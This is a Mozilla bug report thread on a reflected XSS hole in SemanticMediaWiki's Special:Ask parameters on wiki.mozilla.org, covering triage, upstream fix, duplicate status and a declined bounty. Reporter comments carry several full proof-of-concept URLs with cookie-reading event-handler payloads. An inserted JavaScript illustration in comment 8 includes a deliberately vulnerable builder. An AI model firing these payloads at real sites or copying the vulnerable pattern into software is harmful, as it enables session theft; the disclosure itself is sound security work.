Closed
Bug 1041392
Opened 11 years ago
Closed 10 years ago
xss in semantic search parameters
Categories: Websites :: wiki.mozilla.org, defect
Tracking: (Not tracked)
Status: RESOLVED DUPLICATE of bug 801027
People
(Reporter: jeetjaiswal0, Assigned: curtisk)
Details
(Keywords: reporter-external, Whiteboard: [site:wiki.mozilla.org][reporter-external])
Attachments (1 file): 129.32 KB, image/jpeg
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 (Beta/Release)
Build ID: 20140605174243
Steps to reproduce:
Hello, I am Jitendra Jaiswal (security researcher).
During my research I found a high-severity XSS (cookie-stealing) vulnerability on the main domain http://wiki.mozilla.org/
Example:
Domain: http://wiki.mozilla.org/
PoC URLs; reproduce the issue using either of them:
wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt("xss")%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask
To access the cookie: wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask
Steps to reproduce the issue:
1. Go to the URL below: wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask
Load the URL in the browser.
When you give the above link to any user, the XSS payload is stored in the page that is now open.
That URL has an XSS payload which accesses the cookie as:
offset was set to 50" onmouseover=prompt(document.cookie) bad="
Now, when you or the user move the mouse cursor to select a template on the page (shown in the attached image), it triggers the XSS alert that we put in the URL.
Why this works:
Vulnerability description
This script is vulnerable to stored Cross-Site Scripting (XSS) attacks.
Cross-site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted or not, it will execute the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.
Attack details
URL encoded GET input offset was set to 50" onmouseover=prompt(document.cookie) bad="
The input is reflected inside a tag parameter between double quotes.
All the proof is attached; it shows that the XSS works and can access the cookie of a user of the site.
I am also sending an image to show the alert triggered by moving the mouse over the location.
Links to all the XSS proofs; I am sending links because we can attach only one file here:
https://www.dropbox.com/s/gmdwpx0vv28338k/fxss.JPG
https://www.dropbox.com/s/rtd3wdvyax0y95t/xs.JPG?m=
https://www.dropbox.com/s/vk7qfgnu4y6yzez/xss%20mozila.JPG
https://www.dropbox.com/s/84fsbn1e5clp0ah/xxmozila.JPG
PoC image in attachments.
Actual results:
The result is a high-severity XSS security issue for users who use this site.
Expected results:
An XSS filter should be used so that XSS cannot work, keeping users safe on Mozilla's platform.
Assignee
Comment 2•11 years ago
I don't see an XSS here: the cookie is being displayed by an in-content call to onmouseover=prompt(document.cookie) and an onmouseover=prompt("xss"), so this is not executing scripts from outside the domain and thus is not cross-site. Have you found an instance here where you can execute scripts from another domain?
Flags: needinfo?(jeetjaiswal0)
Assignee
Updated•11 years ago
Assignee: nobody → curtisk
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?]
Reporter
Comment 3•11 years ago
Sorry, my mistake: my first link does not work, but my second link
https://wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dalert%282%29%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask
works properly and gives you an XSS alert with the number 2.
And as you say it is not a cross-site issue: what I want to say is that it is a type of XSS issue; if you do not know about that, then read the OWASP site
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
which defines all types of this issue.
And also you can see it is an XSS:
when users use this URL, which contains an onmouseover call, the XSS is stored on the page, and when users go to select a template this XSS executes.
And one more thing: all of the fields of this URL have the XSS vulnerability. I used the XSS script on only one field, offset, but all the other fields are also vulnerable to this attack.
Flags: needinfo?(jeetjaiswal0)
Comment 4•11 years ago
At first glance this appears to be a dupe of bug 801027; however, we are on MediaWiki 1.19.11, which was released earlier this year. I wonder if there was a regression, since bug 801027 says the upstream bug was fixed mid-2013.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?] → [site:wiki.mozilla.org][reporter-external]
Updated•11 years ago
|
Group: mozilla-services-security → websites-security
Component: Web Site → wiki.mozilla.org
Product: Mozilla Services → Websites
Reporter
Comment 5•11 years ago
(In reply to David Chan [:dchan] from comment #4)
> At first glance this appears to be a dupe of bug 801027, however we are on
> mediawiki 1.19.11, which was released earlier this year. I wonder if there
> was a regression since bug 801027 says the upstream bug was fixed mid 2013
Bro, how can I see issue 801027? It is blocked for me.
And if you upgrade this, then it's not a duplicate, bro.
And as I say, all the parameters of my link (link, sort, offset, title, limit and all the others) have this vulnerability.
Assignee
Updated•11 years ago
Summary: high security issue xss (cookie stolen) vulnerability in domain http://wiki.mozilla.org/ → xss in semantic search parameters
Reporter
Comment 7•11 years ago
(In reply to Jitendra jaiswal from comment #5)
> (In reply to David Chan [:dchan] from comment #4)
> > At first glance this appears to be a dupe of bug 801027, however we are on
> > mediawiki 1.19.11, which was released earlier this year. I wonder if there
> > was a regression since bug 801027 says the upstream bug was fixed mid 2013
>
> bro how i seen this issue 801027 its block for me
>
> and if you upgrade this then its not an duplicate bro
>
> and as i say my link all parameter link sort offset title limit and all
If you don't believe me, I'll give you more links for the same issue with different parameters.
In this one I use the sort parameter for the XSS payload:
https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=all&p[sort]=50%22+onmouseover%3Dalert%283%29+bad%3D%22&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes
In this one I use the link parameter:
https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[sort]=&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes
In this one I use the order parameter:
https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=&p[sort]=&p[order]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[headers]=&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes
As I say, all the others are also vulnerable to the same.
Comment 8•11 years ago
Note that I didn't mark it as a dupe since I couldn't determine if it was a regression or not. A minimal test case is:
https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%281%29%20%22
There is some interaction with the "q" parameter, p[format]=template and p[key]. Note that "key" can be anything. Under the above circumstances, the querystring is put inside a data-url attribute without proper encoding. This is the resulting HTML:
<select id="formatSelector" name="p[format]" data-url="/index.php?title=Special:Ask&showformatoptions=this.value&params[foo]=\" autofocus="" onfocus="alert(1)" \"¶ms[offset]="&params[limit]="">
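The attribute-injection mechanism behind both the reporter's offset=50" onmouseover=... payload and the minimal p[foo]=" autofocus onfocus=alert(1) " test case in comment 8, as an added example that is not code from this bug, from SemanticMediaWiki or from Mozilla. It rebuilds the formatSelector tag two ways: a hypothetical naive builder that drops the raw p[key] values into data-url the way the HTML above shows, and a hardened builder that percent-encodes each query component and then HTML-escapes the finished attribute value. A small start-tag attribute scanner then shows that the naive output grows autofocus and onfocus attributes while the hardened output keeps only id, name and data-url. The function names, the params object and the hardening shown are assumptions for illustration; the real upstream fix is the commit linked in comment 14.

```javascript
// Added illustration (not SMW's, MediaWiki's or Mozilla's code): why an
// unencoded query string inside an HTML attribute becomes attribute injection,
// and the two encoding layers that close it. All names here are hypothetical.

// Same shape as the minimal test case in comment 8 of this bug.
const PAYLOAD = '" autofocus onfocus=alert(1) "';

// Naive builder: copies each p[key] value into data-url untouched, which is
// the behaviour the HTML in comment 8 shows. Deliberately vulnerable.
function buildSelectorVulnerable(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `params[${k}]=${v}`)
    .join('&');
  return `<select id="formatSelector" name="p[format]" ` +
    `data-url="/index.php?title=Special:Ask&showformatoptions=this.value&${qs}">`;
}

// HTML attribute escaping: a double quote must never survive unescaped inside
// a double-quoted attribute, and '&' is escaped so sequences such as "&para"
// cannot be read as an entity.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened builder: percent-encode each query component (URL context), then
// escape the finished URL for the attribute (HTML context). Both layers are
// needed; percent-encoding alone would still leave a raw '&' in the attribute.
function buildSelectorHardened(params) {
  const qs = Object.entries(params)
    .map(([k, v]) => `params[${encodeURIComponent(k)}]=${encodeURIComponent(v)}`)
    .join('&');
  const url = `/index.php?title=Special:Ask&showformatoptions=this.value&${qs}`;
  return `<select id="formatSelector" name="p[format]" data-url="${escapeHtmlAttr(url)}">`;
}

// Minimal start-tag attribute scanner (quoted and unquoted values, split the
// way a browser tokenizer would split them). Enough to show whether an
// injected onfocus= became a real attribute. Not a full HTML parser.
function attributeNames(tagHtml) {
  const tag = tagHtml.slice(1, tagHtml.lastIndexOf('>'));
  const names = [];
  const isWs = (c) => /\s/.test(c);
  let i = tag.search(/\s/);            // skip the tag name
  if (i < 0) return names;
  while (i < tag.length) {
    while (i < tag.length && isWs(tag[i])) i++;
    if (i >= tag.length) break;
    const start = i;
    while (i < tag.length && !isWs(tag[i]) && tag[i] !== '=') i++;
    names.push(tag.slice(start, i).toLowerCase());
    while (i < tag.length && isWs(tag[i])) i++;
    if (tag[i] === '=') {
      i++;
      while (i < tag.length && isWs(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {        // quoted value: runs to the next matching quote
        const end = tag.indexOf(q, i + 1);
        i = end < 0 ? tag.length : end + 1;
      } else {                              // unquoted value: runs to the next whitespace
        while (i < tag.length && !isWs(tag[i])) i++;
      }
    }
  }
  return names;
}

// Event-handler attributes present on the tag (anything starting with "on").
function injectedEventHandlers(tagHtml) {
  return attributeNames(tagHtml).filter((n) => n.startsWith('on'));
}

// Constructed request parameters mirroring p[foo], p[offset], p[limit].
const PARAMS = { foo: PAYLOAD, offset: '', limit: '' };
const VULNERABLE_HTML = buildSelectorVulnerable(PARAMS);
const HARDENED_HTML = buildSelectorHardened(PARAMS);

console.log(VULNERABLE_HTML);
console.log('attributes:', attributeNames(VULNERABLE_HTML));
console.log(HARDENED_HTML);
console.log('attributes:', attributeNames(HARDENED_HTML));
```

The quote in the payload closes data-url early, so everything after it is tokenized as further attributes of the select element; autofocus plus onfocus then fires without any user interaction, which is why comment 8's test case needs no mouse movement while the reporter's onmouseover variant does. Encoding for the URL context first and the HTML attribute context second is the general rule for any server-built attribute that carries user input.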
Reporter
Comment 9•11 years ago
Yeah, bro, now you get my point: the issue is with the q parameter and the template parameter.
And yes, here you use some filter for XSS, but for XSS using events you are not filtering, and that creates the risk of XSS on the site or software or whatever it is. Bro, what I want to ask is: according to you, is this a patchable issue or not?
Comment 10•11 years ago
Adding Wikimedia's security engineer and the other member of the MediaWiki release team.
Flags: needinfo?(mah)
Comment 11•11 years ago
Actually, this looks like a problem more in SMW, not MW itself. Finding someone who can look at that.
Comment 12•11 years ago
Looks like this is fixed in the latest SMW. At least, the following does not work: http://www.semantic-mediawiki.org/wiki/Special:Ask?q=&p[searchlabel]=%22%20autofocus%20onfocus=alert%281%29%20%22
Reporter
Comment 13•11 years ago
(In reply to Mark A. Hershberger (hexmode) from comment #11)
> Actually, this looks like a problem more in SMW, not MW itself. Finding
> someone who can look at that.
Bro, I do not understand what you want to say.
Your issue URL and mine are different, and your issue now does not work,
but my issue still works:
https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%28document.cookie%29%20%22
Comment 14•11 years ago
https://github.com/SemanticMediaWiki/SemanticMediaWiki/commit/af0cbe0588722a00b835e140b2725a133a810c8f contains the fix for this. https://bugzilla.wikimedia.org/46852 shows this was reported and fixed back in April.
Comment 15•11 years ago
(In reply to Jitendra jaiswal from comment #13)
> (In reply to Mark A. Hershberger (hexmode) from comment #11)
> > Actually, this looks like a problem more in SMW, not MW itself. Finding
> > someone who can look at that.
>
> bro m not understand what you want to say
Your use of "bro" is strange. In this context it reminds me of a brogrammer (http://www.cnn.com/2012/05/10/opinion/trapani-brogrammer-culture/index.html).
In any case, you did find a genuine bug in the SemanticMediaWiki extension. It was reported back in April and fixed then in SemanticMediaWiki. The fix hasn't yet been deployed to wiki.mozilla.org, so that site is still vulnerable.
Reporter
Comment 16•11 years ago
No, "bro" in India means something like "big brother",
so that is why I use that word.
And as you say, I found a genuine bug in the SemanticMediaWiki extension,
so does that mean my issue is confirmed?
Comment 17•11 years ago
(In reply to Jitendra jaiswal from comment #16)
> so that mean my issue confirm ... ?
You've found an issue on wiki.mozilla.org that is the result of an unpatched fix to a known problem. I can confirm that. I'm not in a position to make any other statement about the issue.
Comment 18•11 years ago
(In reply to Mark A. Hershberger (hexmode) from comment #17)
> is the result of an unpatched fix to a known problem.
Err, I meant "is the result of a known problem that hasn't been fixed by applying the patch that solves the problem."
Reporter
Comment 19•11 years ago
It has been one year, and also in my issue it is not only one parameter that has this issue; all the parameters of my URL are vulnerable, which means XSS works on every parameter or field.
So can anyone confirm for me whether this is valid for the Mozilla bug bounty program?
Assignee
Comment 20•11 years ago
I've nominated this bug for the bounty committee to consider, that does not mean it will receive a bounty but they will review the issue and make a decision.
Flags: sec-bounty?
Reporter
Comment 21•11 years ago
Yeah, I have already received a mail about taking a deeper look at it; maybe that helps with that.
Thanks
Reporter
Comment 22•10 years ago
Hello,
As everyone says the issue is valid, can anyone give me
any update about this issue?
I have not received any update on it and it has been a month.
Comment 23•10 years ago
Hi Jitendra,
Thanks for reporting this issue, however wiki.mozilla.org is not covered under the current bounty program. [1] We intend to expand the bounty program in the future and will look into adding wiki. Unfortunately the committee has decided not to pay a bounty for this issue.
[1] - https://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs
Flags: sec-bounty? → sec-bounty-
Reporter
Comment 24•10 years ago
Thanks to all of you for giving me a good response :P
Comment 25•10 years ago
I'm calling this a dupe of bug 801027. The STR are exactly the same.
I'm waiting on access to the upstream bug, but clearly whatever the fix was didn't fix this issue (which is likely in the extension).
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Comment 26•10 years ago
(In reply to Gordon P. Hemsley [:GPHemsley] from comment #25)
> I'm calling this a dupe of bug 801027. The STR are exactly the same.
>
> I'm waiting on access to the upstream bug, but clearly whatever the fix was
> didn't fix this issue (which is likely in the extension).
Sorry about that, the bug should have been public. I just opened it up:
https://bugzilla.wikimedia.org/show_bug.cgi?id=46852
The patch (https://gerrit.wikimedia.org/r/#/c/57433/) is included in the REL1_23 branch of the extension, and also the "1.9.x" branch. The current download of the SMW bundle from http://www.mediawiki.org/wiki/Semantic_Bundle also has the patch. Where is Mozilla pulling the extension from?
Updated•10 years ago
Group: websites-security
Updated•9 months ago
Keywords: reporter-external